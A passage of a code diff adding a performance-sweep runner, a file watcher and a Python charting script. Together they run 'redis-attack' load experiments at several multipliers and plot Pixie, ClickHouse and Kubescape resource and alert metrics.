+  # When the suite list changes, this list must change too — perf_tool
+  # exits 1 if `--experiment_name=redis-attack-Nx` isn't in the
+  # registry.
+  MULTIPLIERS=(2x 4x 8x 16x 32x 64x)
+else
+  MULTIPLIERS=("$@")
+fi
+log "sweep dir: $SWEEP_DIR"
+log "multipliers: ${MULTIPLIERS[*]}"
+
+t_start=$(date +%s)
+for m in "${MULTIPLIERS[@]}"; do
+  EXP="redis-attack-${m}"
+  OUT="$SWEEP_DIR/${m}"
+  mkdir -p "$OUT"
+  log "=== START $EXP → $OUT ==="
+  iter_start=$(date +%s)
+  if PERF_EXPERIMENT_NAME="$EXP" \
+     PERF_OUT_DIR="$OUT" \
+     PERF_LOG_LEVEL="${PERF_LOG_LEVEL:-info}" \
+     "$SCRIPT_DIR/local-ci.sh" --phases=9 \
+     > "$OUT/local-ci.log" 2>&1; then
+    iter_end=$(date +%s)
+    log "=== DONE $EXP ($((iter_end - iter_start)) s)"
+  else
+    rc=$?
+    iter_end=$(date +%s)
+    log "=== FAIL $EXP (exit=$rc, $((iter_end - iter_start)) s) — see $OUT/local-ci.log"
+    log "aborting sweep — fix and rerun missing multipliers individually"
+    exit "$rc"
+  fi
+done
+t_end=$(date +%s)
+log "sweep complete in $((t_end - t_start)) s — $SWEEP_DIR"
diff --git a/render-sweep-watch.sh b/render-sweep-watch.sh
new file mode 100755
index 00000000000..9730dffafb8
--- /dev/null
+++ b/render-sweep-watch.sh
@@ -0,0 +1,44 @@
+#!/usr/bin/env bash
+# render-sweep-watch.sh — poll the sweep dir; re-render PNGs whenever a new
+# Nx/.../results_*.parquet appears.
+#
+# Usage:
+#   ./render-sweep-watch.sh        # watch the latest perf-sweep-*
+#   ./render-sweep-watch.sh /tmp/perf-sweep-20260514-114224
+#
+# Idempotent — running this twice on the same dir produces the same PNGs.
+# Stops auto-rendering once the sweep is done (sweep.log shows "sweep complete").
set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+PY="${PY:-/home/constanze/.venvs/render/bin/python}"
+RENDER="$SCRIPT_DIR/render-sweep.py"
+
+if [[ ${1:-} ]]; then
+  SWEEP="$1"
+else
+  SWEEP=$(ls -dt /tmp/perf-sweep-2*/ 2>/dev/null | head -1)
+fi
+[[ -z "${SWEEP:-}" || ! -d "$SWEEP" ]] && { echo "no sweep dir"; exit 1; }
+SWEEP="${SWEEP%/}"
+echo "watching: $SWEEP"
+
+prev_signature=""
+while true; do
+  # Build a signature from the modification times of all results parquets;
+  # whenever one is added or grows, the signature changes and we re-render.
+  signature=$(find "$SWEEP" -name 'results_*.parquet' -printf '%p:%T@:%s\n' \
+    2>/dev/null | sort)
+  if [[ "$signature" != "$prev_signature" ]]; then
+    echo "$(date -Is) — rendering ($(echo "$signature" | wc -l) parquets)"
+    "$PY" "$RENDER" "$SWEEP" || echo "(render failed — keeping watcher alive)"
+    prev_signature="$signature"
+  fi
+  # If sweep is done, render once more and exit so the process doesn't linger.
+  if grep -q "sweep complete" "$SWEEP/sweep.log" 2>/dev/null; then
+    echo "$(date -Is) — sweep complete, final render done, exiting"
+    "$PY" "$RENDER" "$SWEEP" || true
+    exit 0
+  fi
+  sleep 30
+done
diff --git a/render-sweep.py b/render-sweep.py
new file mode 100755
index 00000000000..d609f7bb413
--- /dev/null
+++ b/render-sweep.py
@@ -0,0 +1,792 @@
+#!/usr/bin/env python3
+"""render-sweep.py — turn perf_tool parquet output into inspection PNGs.
+
+Discovers every `<sweep>/<Nx>/.../*.parquet` produced by `perf-sweep.sh`,
+renders a per-run multi-panel PNG, and a cross-run summary that compares all
+multipliers on the same axes.
+
+Runs idempotently — re-rendering existing PNGs is safe; the watcher
+(`render-sweep-watch.sh`) reinvokes this script every time a new parquet
+appears on disk so you can inspect partial results during the sweep.
+
+Inputs assumed:
+  <sweep>/<Nx>/2026/MM/DD/<ts>/results_0000*.parquet
+  <sweep>/<Nx>/2026/MM/DD/<ts>/spec.parquet
+
+Output:
+  <sweep>/<Nx>.png      — 6-panel per-run inspection chart
+  <sweep>/summary.png   — small-multiples cross-run comparison
+  <sweep>/scorecard.png — bar chart: peak/mean of key metrics per run
+
+Spotting bugs:
+  * recorder rate flat across BURNIN vs RUN → bobctl/k6 not adding load
+  * PEM CPU plateaus before 100% → bottleneck elsewhere
+  * CH memory climbing monotonically → OOM coming
+  * forensic_alert_count stays 0 → kubescape→Vector pipeline broken
+"""
+
+import argparse
+import json
+import os
+import re
+import sys
+from dataclasses import dataclass
+from pathlib import Path
+
+import matplotlib
+matplotlib.use("Agg")  # no display on the VM
+import matplotlib.pyplot as plt
+import matplotlib.dates as mdates
+import pandas as pd
+import pyarrow.parquet as pq
+
+# ------------------------------------------------------------------ helpers
+
+MULTIPLIER_RE = re.compile(r"^(\d+)x$")
+
+
+@dataclass
+class RunData:
+    name: str               # "1x"
+    multiplier: int         # 1
+    results_path: Path
+    spec_path: Path | None
+    results: pd.DataFrame   # long-format metric rows
+    actions: pd.DataFrame   # begin_X/end_X timeline
+    spec_tags: list[str]    # tags from spec.parquet
+
+    @property
+    def run_start(self):
+        m = self.actions.query("name == 'begin_run:'")
+        return m["timestamp"].iloc[0] if not m.empty else None
+
+    @property
+    def run_end(self):
+        m = self.actions.query("name == 'end_run:'")
+        return m["timestamp"].iloc[0] if not m.empty else None
+
+    @property
+    def burnin_start(self):
+        m = self.actions.query("name == 'begin_burnin:'")
+        return m["timestamp"].iloc[0] if not m.empty else None
+
+
+def find_runs(sweep_dir: Path) -> list[RunData]:
+    """Discover all Nx/ subdirs with finished parquets. Skip in-flight runs."""
+    runs: list[RunData] = []
+    for sub in sorted(sweep_dir.iterdir(), key=lambda p: p.name):
+        if not sub.is_dir():
+            continue
+        m = MULTIPLIER_RE.match(sub.name)
+        if not m:
+            continue
+        results = list(sub.rglob("results_*.parquet"))
+        if not results:
+            continue  # in-flight, no parquet yet
+        # If there are multiple result files, pick the largest (most rows).
+        results.sort(key=lambda p: p.stat().st_size, reverse=True)
+        res_path = results[0]
+        # A tiny (<1 KiB) parquet means perf_tool aborted mid-write — skip.
+        if res_path.stat().st_size < 1024:
+            continue
+        spec_candidates = list(res_path.parent.glob("spec.parquet"))
+        spec_path = spec_candidates[0] if spec_candidates else None
+
+        results_df = pq.read_table(res_path).to_pandas()
+        results_df["timestamp"] = pd.to_datetime(
+            results_df["timestamp"], utc=True
+        )
+        actions = results_df[
+            results_df["name"].str.startswith(("begin_", "end_"))
+        ].copy()
+        spec_tags: list[str] = []
+        if spec_path is not None:
+            try:
+                spec_row = pq.read_table(spec_path).to_pandas().iloc[0]
+                spec_obj = json.loads(spec_row["spec"])
+                spec_tags = list(spec_obj.get("tags", []))
+            except Exception as e:  # pragma: no cover
+                print(f"  ! 
spec parse failed for {sub.name}: {e}", + file=sys.stderr) + runs.append( + RunData( + name=sub.name, + multiplier=int(m.group(1)), + results_path=res_path, + spec_path=spec_path, + results=results_df, + actions=actions, + spec_tags=spec_tags, + ) + ) + return runs + + +def _phase_markers(ax, run: RunData): + """Vertical lines for BURNIN start, RUN start, RUN end.""" + for ts, label, color in [ + (run.burnin_start, "burnin", "#888888"), + (run.run_start, "RUN", "#cc0000"), + (run.run_end, "end", "#888888"), + ]: + if ts is not None: + ax.axvline(ts, color=color, linestyle="--", linewidth=1, alpha=0.6) + ax.text( + ts, ax.get_ylim()[1], f" {label}", + fontsize=7, color=color, va="top", ha="left", + ) + + +def _filter_run(df: pd.DataFrame, run: RunData) -> pd.DataFrame: + """Limit a metric series to the experiment's begin_run..end_run window.""" + if run.run_start is None or run.run_end is None: + return df + return df[(df["timestamp"] >= run.run_start) + & (df["timestamp"] <= run.run_end)] + + +def _delta_rate(df: pd.DataFrame, per_seconds: float = 60.0) -> pd.DataFrame: + """Convert a monotonic-counter time series to per-N-seconds rate.""" + df = df.sort_values("timestamp").reset_index(drop=True) + df["dt"] = df["timestamp"].diff().dt.total_seconds() + df["dv"] = df["value"].diff() + df["rate"] = (df["dv"] / df["dt"]) * per_seconds + df = df[df["rate"] >= 0] # drop the first row + any counter resets + return df + + +# ------------------------------------------------------------------ per-run + +POD_COLORS = { + "vizier-pem": "#1f77b4", + "kelvin": "#ff7f0e", + "vizier-query-broker": "#2ca02c", + "vizier-metadata": "#9467bd", + "vizier-cloud-connector": "#8c564b", + "pl-nats": "#7f7f7f", +} + + +def _pod_color(pod: str) -> str: + for prefix, c in POD_COLORS.items(): + if prefix in pod: + return c + return "#cccccc" + + +def render_run(run: RunData, out_path: Path) -> None: + fig, axes = plt.subplots(4, 2, figsize=(15, 14), constrained_layout=True) + fig.suptitle( + f"{run.name} ({run.multiplier}× load) — " + f"results: {run.results_path.relative_to(run.results_path.parents[5])}", + fontsize=12, + y=1.02, + ) + + # ----- panel (0,0) recorder export rate (events / 5s tick) ----- + ax = axes[0, 0] + ex = run.results[run.results["name"] == "clickhouse_export_rows"] + if not ex.empty: + ax.plot(ex["timestamp"], ex["value"], marker=".", markersize=2, + linewidth=0.8, label="rows/tick") + ax.set_title("Pixie → CH recorder rate (rows per 5s tick)") + ax.set_ylabel("rows per tick") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("clickhouse_export_rows — NO DATA") + ax.text(0.5, 0.5, "no data", ha="center", va="center", + transform=ax.transAxes, color="red") + + # ----- panel (0,1) per-pod CPU (during RUN) ----- + ax = axes[0, 1] + cpu = run.results[run.results["name"] == "cpu_usage"] + cpu = _filter_run(cpu, run) + if not cpu.empty: + for pod, g in cpu.groupby("tag_pod"): + label = pod.split("/")[-1] if pod else "?" 
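+            # tag_pod is assumed to look like "namespace/pod-name"; keep just
+            # the pod name and truncate it below so the legend stays readable.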
+ ax.plot(g["timestamp"], g["value"] * 100, + label=label[:30], linewidth=1.0, color=_pod_color(pod)) + ax.set_title("Pixie pods CPU% (during RUN)") + ax.set_ylabel("% of one core") + ax.legend(fontsize=7, loc="upper right", ncol=2) + ax.grid(alpha=0.3) + else: + ax.set_title("cpu_usage — NO DATA") + + # ----- panel (1,0) CH memory ----- + ax = axes[1, 0] + mem = run.results[ + run.results["name"] == "clickhouse_memory_tracking_bytes" + ] + if not mem.empty: + ax.plot(mem["timestamp"], mem["value"] / 1e9, + color="#d62728", linewidth=1.2) + ax.set_title("ClickHouse memory_tracking (GB)") + ax.set_ylabel("GB") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("clickhouse_memory_tracking_bytes — NO DATA") + + # ----- panel (1,1) CH parts_active + queries_total rate ----- + ax = axes[1, 1] + parts = run.results[run.results["name"] == "clickhouse_parts_active"] + qrate = run.results[run.results["name"] == "clickhouse_queries_total"] + qrate = _delta_rate(qrate) + if not parts.empty: + ax.plot(parts["timestamp"], parts["value"], + color="#17becf", linewidth=1.2, label="parts_active") + if not qrate.empty: + ax2 = ax.twinx() + ax2.plot(qrate["timestamp"], qrate["rate"], + color="#bcbd22", linewidth=1.0, label="queries/min") + ax2.set_ylabel("queries/min", color="#bcbd22") + ax2.tick_params(axis="y", labelcolor="#bcbd22") + ax.set_title("CH parts_active + query rate") + ax.set_ylabel("parts_active", color="#17becf") + ax.tick_params(axis="y", labelcolor="#17becf") + ax.grid(alpha=0.3) + + # ----- panel (2,0) forensic_alert_count over time ----- + ax = axes[2, 0] + alerts = run.results[run.results["name"] == "forensic_alert_count"] + if not alerts.empty: + ax.plot(alerts["timestamp"], alerts["value"], + color="#e377c2", linewidth=1.2, marker=".", markersize=3) + ax.set_title(f"forensic_alert_count " + f"(max={int(alerts['value'].max())})") + ax.set_ylabel("alerts in window") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("forensic_alert_count — NO DATA") + + # ----- panel (2,1) inserted_rows rate (rows/min) ----- + ax = axes[2, 1] + ins = run.results[run.results["name"] == "clickhouse_inserted_rows_total"] + ins = _delta_rate(ins) + if not ins.empty: + ax.plot(ins["timestamp"], ins["rate"] / 1e3, + color="#9467bd", linewidth=1.2) + ax.set_title(f"CH inserted rows/min (peak: " + f"{int(ins['rate'].max()/1e3)}K/min)") + ax.set_ylabel("K rows/min") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("clickhouse_inserted_rows_total — NO DATA") + + # ----- panel (3,0) kubescape node-agent CPU% + RSS ----- + ax = axes[3, 0] + ks_cpu_total = run.results[ + run.results["name"] == "kubescape_node_agent_cpu_seconds_total" + ] + # cpu_seconds_total is a monotonic Prometheus counter — convert to + # CPU% by dividing the delta by the wall-clock delta and *100. 
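+    # Worked example (hypothetical numbers): two samples 15 s apart with
+    # cpu_seconds_total going 120.0 -> 126.0 yield (126.0 - 120.0) / 15 * 100
+    # = 40, i.e. the node-agent averaged 40% of one core over that interval.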
+ ks_cpu_rate = _delta_rate(ks_cpu_total, per_seconds=100.0) + ks_rss = run.results[run.results["name"] == "kubescape_node_agent_rss"] + plotted_any = False + if not ks_cpu_rate.empty: + ax.plot(ks_cpu_rate["timestamp"], ks_cpu_rate["rate"], + color="#1f77b4", linewidth=1.2, label="CPU %") + plotted_any = True + if not ks_rss.empty: + ax2 = ax.twinx() + ax2.plot(ks_rss["timestamp"], ks_rss["value"] / (1024 * 1024), + color="#ff7f0e", linewidth=1.2, label="RSS MB") + ax2.set_ylabel("RSS MB", color="#ff7f0e") + ax2.tick_params(axis="y", labelcolor="#ff7f0e") + plotted_any = True + if plotted_any: + cpu_peak = (ks_cpu_rate['rate'].max() + if not ks_cpu_rate.empty else 0) + rss_peak_mb = (ks_rss['value'].max() / (1024 * 1024) + if not ks_rss.empty else 0) + ax.set_title( + f"Kubescape node-agent (peak: {cpu_peak:.0f}% CPU, " + f"{rss_peak_mb:.0f} MB RSS)" + ) + ax.set_ylabel("CPU %", color="#1f77b4") + ax.tick_params(axis="y", labelcolor="#1f77b4") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("kubescape_node_agent_* — NO DATA") + + # ----- panel (3,1) kubescape node-agent goroutines (leak detector) ----- + ax = axes[3, 1] + ks_g = run.results[run.results["name"] == "kubescape_node_agent_goroutines"] + if not ks_g.empty: + ax.plot(ks_g["timestamp"], ks_g["value"], + color="#2ca02c", linewidth=1.2, marker=".", markersize=3) + # First-vs-last comparison flags monotonic growth → goroutine leak. + first = ks_g.iloc[0]["value"] + last = ks_g.iloc[-1]["value"] + ax.set_title( + f"Kubescape goroutines (start={int(first)}, end={int(last)}, " + f"peak={int(ks_g['value'].max())})" + ) + ax.set_ylabel("goroutines") + ax.grid(alpha=0.3) + _phase_markers(ax, run) + else: + ax.set_title("kubescape_node_agent_goroutines — NO DATA") + + # x-axis formatter for all time-series panels + for ax in axes.flat: + ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M")) + + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ summary + +def render_summary(runs: list[RunData], out_path: Path) -> None: + """Small-multiples: each multiplier on the same recorder-rate axis, + stacked top-to-bottom so it's obvious whether 16× actually achieves 16×. + """ + if not runs: + return + fig, axes = plt.subplots( + len(runs), 1, + figsize=(14, 2.5 * len(runs)), + sharex=False, + constrained_layout=True, + ) + if len(runs) == 1: + axes = [axes] + fig.suptitle( + "Recorder rate across load multipliers (rows / 5s tick)", + fontsize=13, + y=1.0, + ) + for ax, run in zip(axes, runs): + ex = run.results[run.results["name"] == "clickhouse_export_rows"] + if ex.empty: + ax.text(0.5, 0.5, "no data", ha="center", va="center", + transform=ax.transAxes, color="red") + ax.set_title(f"{run.name}") + continue + ax.plot(ex["timestamp"], ex["value"], + marker=".", markersize=2, linewidth=0.8) + ax.set_title( + f"{run.name} ({run.multiplier}×): " + f"mean={ex['value'].mean():.0f}, peak={ex['value'].max():.0f}, " + f"n={len(ex)} ticks" + ) + ax.set_ylabel("rows/tick") + ax.grid(alpha=0.3) + ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M")) + _phase_markers(ax, run) + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ scorecard + +def render_scorecard(runs: list[RunData], out_path: Path) -> None: + """Grouped bar chart: peak/mean of key metrics per multiplier. + Designed to make non-linear scaling jump out (e.g. 
16× recorder rate + not actually 16× because of a bottleneck).""" + if not runs: + return + rows = [] + for r in runs: + ex = r.results[r.results["name"] == "clickhouse_export_rows"] + cpu_pem = r.results[ + (r.results["name"] == "cpu_usage") + & r.results["tag_pod"].fillna("").str.contains("vizier-pem") + ] + cpu_pem = _filter_run(cpu_pem, r) + mem = r.results[ + r.results["name"] == "clickhouse_memory_tracking_bytes" + ] + ins = _delta_rate( + r.results[r.results["name"] == "clickhouse_inserted_rows_total"] + ) + ks_cpu = _delta_rate( + r.results[r.results["name"] == "kubescape_node_agent_cpu_seconds_total"], + per_seconds=100.0, + ) + ks_rss = r.results[ + r.results["name"] == "kubescape_node_agent_rss" + ] + ks_g = r.results[ + r.results["name"] == "kubescape_node_agent_goroutines" + ] + rows.append({ + "multiplier": r.multiplier, + "name": r.name, + "recorder_mean_per_tick": ex["value"].mean() if not ex.empty else 0, + "recorder_peak_per_tick": ex["value"].max() if not ex.empty else 0, + "pem_cpu_mean_pct": (cpu_pem["value"].mean()*100) if not cpu_pem.empty else 0, + "pem_cpu_peak_pct": (cpu_pem["value"].max()*100) if not cpu_pem.empty else 0, + "ch_mem_peak_gb": (mem["value"].max()/1e9) if not mem.empty else 0, + "ch_ins_peak_kpm": (ins["rate"].max()/1e3) if not ins.empty else 0, + "ks_cpu_mean_pct": ks_cpu["rate"].mean() if not ks_cpu.empty else 0, + "ks_cpu_peak_pct": ks_cpu["rate"].max() if not ks_cpu.empty else 0, + "ks_rss_peak_mb": (ks_rss["value"].max()/(1024*1024)) if not ks_rss.empty else 0, + "ks_goroutines_peak": ks_g["value"].max() if not ks_g.empty else 0, + }) + df = pd.DataFrame(rows).sort_values("multiplier").reset_index(drop=True) + metrics = [ + ("recorder_mean_per_tick", "Recorder mean rows/tick"), + ("recorder_peak_per_tick", "Recorder peak rows/tick"), + ("pem_cpu_mean_pct", "PEM CPU mean %"), + ("pem_cpu_peak_pct", "PEM CPU peak %"), + ("ch_mem_peak_gb", "CH memory peak GB"), + ("ch_ins_peak_kpm", "CH inserts peak K/min"), + ("ks_cpu_mean_pct", "Kubescape node-agent CPU mean %"), + ("ks_cpu_peak_pct", "Kubescape node-agent CPU peak %"), + ("ks_rss_peak_mb", "Kubescape node-agent RSS peak MB"), + ] + fig, axes = plt.subplots(3, 3, figsize=(15, 10), constrained_layout=True) + fig.suptitle( + "Scorecard across load multipliers — " + "ideal: linear in mult unless bottlenecked", + fontsize=12, y=1.02, + ) + for ax, (col, title) in zip(axes.flat, metrics): + bars = ax.bar(df["name"], df[col], color="#1f77b4") + for b, v in zip(bars, df[col]): + ax.text(b.get_x() + b.get_width() / 2, b.get_height(), + f"{v:.1f}", ha="center", va="bottom", fontsize=8) + ax.set_title(title) + ax.grid(axis="y", alpha=0.3) + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ alerts + +def render_alert_distribution(runs: list[RunData], out_path: Path) -> None: + """Plot forensic_alert_count vs minutes-from-RUN-start across all runs, + plus a cumulative view + an "alerts in first half vs second half" stat. + + The hypothesis we're testing: Kubescape's ApplicationProfile is in + "learning" state for the first few minutes after pod creation, then + transitions to "completed" — at which point R0002 et al start firing + against actual baseline-deviating traffic. If the profile completes + deep into the RUN window, every alert clusters near the end. 
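+    If that holds, panel 2's "% late" annotation (the share of the alert
+    mass landing in the second half of RUN) should sit well above 50% at
+    every multiplier.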
+ """ + if not runs: + return + fig, axes = plt.subplots(3, 1, figsize=(14, 11), constrained_layout=True) + fig.suptitle( + "forensic_alert_count distribution — when do alerts actually fire?", + fontsize=13, y=1.0, + ) + cmap = plt.colormaps.get_cmap("viridis") + n = len(runs) + + # ----- panel 0: alerts per 30s tick, time relative to RUN-start ----- + ax = axes[0] + rows_for_table = [] + for i, run in enumerate(runs): + alerts = run.results[run.results["name"] == "forensic_alert_count"] + if alerts.empty or run.run_start is None: + continue + rel = (alerts["timestamp"] - run.run_start).dt.total_seconds() / 60.0 + ax.plot(rel, alerts["value"], + color=cmap(i / max(n - 1, 1)), + marker=".", markersize=4, linewidth=1.0, + label=f"{run.name} (peak {int(alerts['value'].max())})") + # phase ratio: alerts in first half of RUN vs second half + dur_min = (run.run_end - run.run_start).total_seconds() / 60.0 \ + if run.run_end is not None else rel.max() + first_half = alerts[ + (alerts["timestamp"] >= run.run_start) + & (alerts["timestamp"] < run.run_start + pd.Timedelta( + minutes=dur_min / 2)) + ]["value"].sum() + second_half = alerts[ + (alerts["timestamp"] >= run.run_start + pd.Timedelta( + minutes=dur_min / 2)) + & (alerts["timestamp"] <= (run.run_end or alerts["timestamp"].max())) + ]["value"].sum() + total = first_half + second_half + rows_for_table.append({ + "name": run.name, + "total": int(total), + "first_half": int(first_half), + "second_half": int(second_half), + "second_half_pct": (100.0 * second_half / total) if total else 0, + }) + ax.axvline(0, color="red", linestyle="--", linewidth=1, alpha=0.7, + label="RUN start") + ax.set_title("Alerts per 30 s metric tick (x-axis: minutes since RUN start)") + ax.set_xlabel("minutes since begin_run") + ax.set_ylabel("alerts in last 1-min window") + ax.legend(fontsize=8, loc="upper left") + ax.grid(alpha=0.3) + + # ----- panel 1: cumulative alerts over RUN-relative time ----- + ax = axes[1] + for i, run in enumerate(runs): + alerts = run.results[run.results["name"] == "forensic_alert_count"] \ + .sort_values("timestamp") + if alerts.empty or run.run_start is None: + continue + rel = (alerts["timestamp"] - run.run_start).dt.total_seconds() / 60.0 + cum = alerts["value"].cumsum() + ax.plot(rel, cum, + color=cmap(i / max(n - 1, 1)), + linewidth=1.4, + label=f"{run.name} (Σ {int(cum.iloc[-1])})") + ax.axvline(0, color="red", linestyle="--", linewidth=1, alpha=0.7) + ax.set_title("Cumulative alerts (steeper later in RUN ⇒ profile-learning lag)") + ax.set_xlabel("minutes since begin_run") + ax.set_ylabel("cumulative alerts") + ax.legend(fontsize=8, loc="upper left") + ax.grid(alpha=0.3) + + # ----- panel 2: stacked bar showing first-half vs second-half split ----- + ax = axes[2] + if rows_for_table: + df = pd.DataFrame(rows_for_table) + x = range(len(df)) + b1 = ax.bar(x, df["first_half"], color="#888888", + label="first half of RUN") + b2 = ax.bar(x, df["second_half"], bottom=df["first_half"], + color="#d62728", label="second half of RUN") + for i, (b, pct) in enumerate(zip(b2, df["second_half_pct"])): + ax.text(i, df["first_half"].iloc[i] + df["second_half"].iloc[i], + f"{pct:.0f}% late", + ha="center", va="bottom", fontsize=9, fontweight="bold") + ax.set_xticks(list(x)) + ax.set_xticklabels(df["name"]) + ax.set_title( + "Alerts grouped by RUN-half — " + "% late ≈ how much of the alert mass clusters in the second half " + "(profile-completion fingerprint)" + ) + ax.set_ylabel("Σ alerts in window") + ax.legend(fontsize=9) + ax.grid(axis="y", 
alpha=0.3) + + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ scaling + +# KPI extractors — each returns (mean_during_run, max_during_run) for a single +# RunData. Returning NaN means "missing"; the plot will skip that point. +import math + + +def _kpi_recorder(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "clickhouse_export_rows"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean(), df["value"].max() + + +def _kpi_pem_cpu(r: RunData) -> tuple[float, float]: + df = r.results[ + (r.results["name"] == "cpu_usage") + & r.results["tag_pod"].fillna("").str.contains("vizier-pem") + ] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() * 100, df["value"].max() * 100 + + +def _kpi_kelvin_cpu(r: RunData) -> tuple[float, float]: + df = r.results[ + (r.results["name"] == "cpu_usage") + & r.results["tag_pod"].fillna("").str.contains("kelvin") + ] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() * 100, df["value"].max() * 100 + + +def _kpi_ch_memory_gb(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "clickhouse_memory_tracking_bytes"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() / 1e9, df["value"].max() / 1e9 + + +def _kpi_ch_inserts_kpm(r: RunData) -> tuple[float, float]: + df = _delta_rate( + r.results[r.results["name"] == "clickhouse_inserted_rows_total"] + ) + if df.empty: + return math.nan, math.nan + return df["rate"].mean() / 1e3, df["rate"].max() / 1e3 + + +def _kpi_alerts(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "forensic_alert_count"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean(), df["value"].max() + + +def _kpi_ks_cpu(r: RunData) -> tuple[float, float]: + df = _delta_rate( + r.results[r.results["name"] == "kubescape_node_agent_cpu_seconds_total"], + per_seconds=100.0, + ) + if df.empty: + return math.nan, math.nan + return df["rate"].mean(), df["rate"].max() + + +def _kpi_ks_rss_mb(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "kubescape_node_agent_rss"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean() / (1024 * 1024), df["value"].max() / (1024 * 1024) + + +def _kpi_ks_goroutines(r: RunData) -> tuple[float, float]: + df = r.results[r.results["name"] == "kubescape_node_agent_goroutines"] + df = _filter_run(df, r) + if df.empty: + return math.nan, math.nan + return df["value"].mean(), df["value"].max() + + +# (extractor, panel title, y-axis unit) +SCALING_KPIS = [ + (_kpi_recorder, "Recorder rows/tick", "rows/tick"), + (_kpi_pem_cpu, "PEM CPU", "% (of one core)"), + (_kpi_kelvin_cpu, "Kelvin CPU", "% (of one core)"), + (_kpi_ch_memory_gb, "CH memory_tracking", "GB"), + (_kpi_ch_inserts_kpm, "CH inserted rows/min", "K rows/min"), + (_kpi_alerts, "forensic_alert_count", "alerts / 1-min window"), + (_kpi_ks_cpu, "Kubescape node-agent CPU", "%"), + (_kpi_ks_rss_mb, "Kubescape node-agent RSS", "MB"), + (_kpi_ks_goroutines, "Kubescape goroutines", "count"), +] + + +def render_scaling(runs: list[RunData], out_path: Path) -> None: + """Log-log scaling chart: each panel plots mean+max of a KPI versus + the load multiplier. 
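+    On these axes a strictly linear KPI doubles whenever the multiplier
+    doubles (slope 1); with illustrative numbers, a KPI going 100 -> 180
+    between 2x and 4x has slope log2(1.8) ≈ 0.85, i.e. sub-linear.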
Linear-on-log-log = power-law scaling; flat or + concave shape ⇒ saturation / bottleneck has kicked in. + + Useful for spotting where Pixie / CH / kubescape stop scaling + linearly with workload, which is the *whole point* of a load sweep. + """ + if not runs: + return + runs = sorted(runs, key=lambda r: r.multiplier) + multipliers = [r.multiplier for r in runs] + + fig, axes = plt.subplots(3, 3, figsize=(15, 11), constrained_layout=True) + fig.suptitle( + "Scaling — log-log: mean (solid) & max (dashed) KPI vs load multiplier " + "[ideal: straight line, slope ≈ 1 = strict linear]", + fontsize=12, y=1.02, + ) + for ax, (extractor, title, unit) in zip(axes.flat, SCALING_KPIS): + means, maxes = [], [] + for r in runs: + m, mx = extractor(r) + means.append(m) + maxes.append(mx) + ax.plot(multipliers, means, + marker="o", linewidth=1.4, color="#1f77b4", label="mean") + ax.plot(multipliers, maxes, + marker="s", linewidth=1.0, color="#d62728", + linestyle="--", label="max") + # Annotate each point so you can read raw numbers off the chart. + for x, y in zip(multipliers, means): + if y is not None and not (isinstance(y, float) and math.isnan(y)): + ax.annotate(f"{y:.1f}", (x, y), + textcoords="offset points", xytext=(4, 4), + fontsize=7, color="#1f77b4") + for x, y in zip(multipliers, maxes): + if y is not None and not (isinstance(y, float) and math.isnan(y)): + ax.annotate(f"{y:.1f}", (x, y), + textcoords="offset points", xytext=(4, -10), + fontsize=7, color="#d62728") + # log-log axes when feasible; fall back to linear if values are zero + # or negative on either series (matplotlib refuses log on those). + all_vals = [v for v in means + maxes if v is not None + and not (isinstance(v, float) and math.isnan(v))] + if all_vals and min(all_vals) > 0: + ax.set_xscale("log", base=2) + ax.set_yscale("log") + # Show the actual multiplier values, not 2^n labels. + ax.set_xticks(multipliers) + ax.get_xaxis().set_major_formatter( + plt.matplotlib.ticker.ScalarFormatter() + ) + else: + # Some KPI series have 0s (typical for forensic_alert_count + # mean ≈ 0 if the kubescape pipeline is broken). Log-scale + # x, linear y so at least the multiplier axis stays right. 
+ ax.set_xscale("log", base=2) + ax.set_xticks(multipliers) + ax.get_xaxis().set_major_formatter( + plt.matplotlib.ticker.ScalarFormatter() + ) + ax.set_xlabel("load multiplier (×)") + ax.set_ylabel(unit) + ax.set_title(title, fontsize=10) + ax.grid(which="both", alpha=0.3) + ax.legend(fontsize=8, loc="best") + + fig.savefig(out_path, dpi=120, bbox_inches="tight") + plt.close(fig) + + +# ------------------------------------------------------------------ main + +def main(): + p = argparse.ArgumentParser(description=__doc__) + p.add_argument("sweep_dir", type=Path, nargs="?", + help="path to perf-sweep- dir; defaults to latest") + args = p.parse_args() + + if args.sweep_dir is None: + candidates = sorted( + Path("/tmp").glob("perf-sweep-*"), + key=lambda p: p.stat().st_mtime, reverse=True, + ) + if not candidates: + print("no /tmp/perf-sweep-* dirs found", file=sys.stderr) + return 1 + args.sweep_dir = candidates[0] + print(f"sweep_dir (auto): {args.sweep_dir}", file=sys.stderr) + + runs = find_runs(args.sweep_dir) + if not runs: + print("no finished parquets found in", args.sweep_dir, file=sys.stderr) + return 0 + + for r in runs: + out = args.sweep_dir / f"{r.name}.png" + render_run(r, out) + print(f" {r.name}.png (results: {len(r.results)} rows, " + f"{r.spec_tags[:3] if r.spec_tags else '—'})") + + render_summary(runs, args.sweep_dir / "summary.png") + print(f" 